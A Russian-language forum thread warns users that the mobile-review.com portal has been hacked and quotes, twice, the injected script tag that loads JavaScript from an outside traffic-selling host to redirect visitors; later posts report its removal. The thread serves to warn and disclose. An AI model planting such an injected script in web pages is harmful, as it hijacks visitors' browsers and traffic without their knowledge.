Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Компьютеры + Интернет » Мобильные ОС, смартфоны и планшеты » Будьте осторожны, портал www.mobile-review.com проифреймлен!

Ответить
Настройки темы
Будьте осторожны, портал www.mobile-review.com проифреймлен!

Старожил

Благодарности: 32

Профиль | Сайт | Отправить PM | Цитировать

Мой любимый портал о мобильной связи проифреймили (((
На главной странице разместили участок кода:
<script type="text/javascript" src="http://iframepay.com/tds/js.php"></script>;
который гонит весь траф на партнерку по скупке нелегального траффика.
Я уже сообщил админам портала об этой серьезной проблеме, но эти господа дятлы чего-то не чешутся.
Собственно мне пофиг когда дятлы с других неинтересных порталов оказываются похеканными (каждый зарабатывает как может), но в данном случае меня напрягает, что мой любимый портал ломанули.
Будьте осторожны!

-------
Добро пожаловать на мой блог о всех старых и новых незаконных трюках сотовых операторов!

Это сообщение посчитали полезным следующие участники:

Отправлено: 16:08, 25-02-2009

Старожил

Благодарности: 32

Профиль | Сайт | Отправить PM | Цитировать

судя по всему, админы мобайлревью все-таки проснулись и сняли ифрейм.

-------
Добро пожаловать на мой блог о всех старых и новых незаконных трюках сотовых операторов!

Отправлено: 22:52, 26-02-2009 | #2

Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.

Новый участник

Благодарности: 3

Профиль | Отправить PM | Цитировать

Цитата Igor_A:
Мой любимый портал о мобильной связи проифреймили (((
На главной странице разместили участок кода:
<script type="text/javascript" src="http://iframepay.com/tds/js.php"></script>;
который гонит весь траф на партнерку по скупке нелегального траффика.
Я уже сообщил админам портала об этой серьезной проблеме, но эти господа дятлы чего-то не чешутся.
Собственно мне пофиг когда дятлы с других неинтересных порталов оказываются похеканными (каждый зарабатывает как может), но в данном случае меня напрягает, что мой любимый портал ломанули.
Будьте осторожны! »
Спс за инфу!

-------
Нам отказано в долгой жизни; оставим труды, которые докажут, что мы жили! Плиний Старший

Отправлено: 23:54, 17-03-2009 | #3

Старожил

Благодарности: 20

Профиль | Отправить PM | Цитировать

Цитата Igor_A:
Я уже сообщил админам портала об этой серьезной проблеме, но эти господа дятлы чего-то не чешутся. »
А им до фонаря, что ты им сказал об ошибке, ты не будешь ходить на тот сайт, другие будут. Так что ты их не напугал этим. Другие будут ходить. А, если они не дорожат пользователями, то это их проблемы. Да и, навряд ли они потеряют клиентов. У администратора того сайта, есть ещё 10 сайтов, так что не велика потеря для них

-------
Трям и вам!

Отправлено: 13:24, 18-03-2009 | #4

Компьютерный форум OSzone.net » Компьютеры + Интернет » Мобильные ОС, смартфоны и планшеты » Будьте осторожны, портал www.mobile-review.com проифреймлен!

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено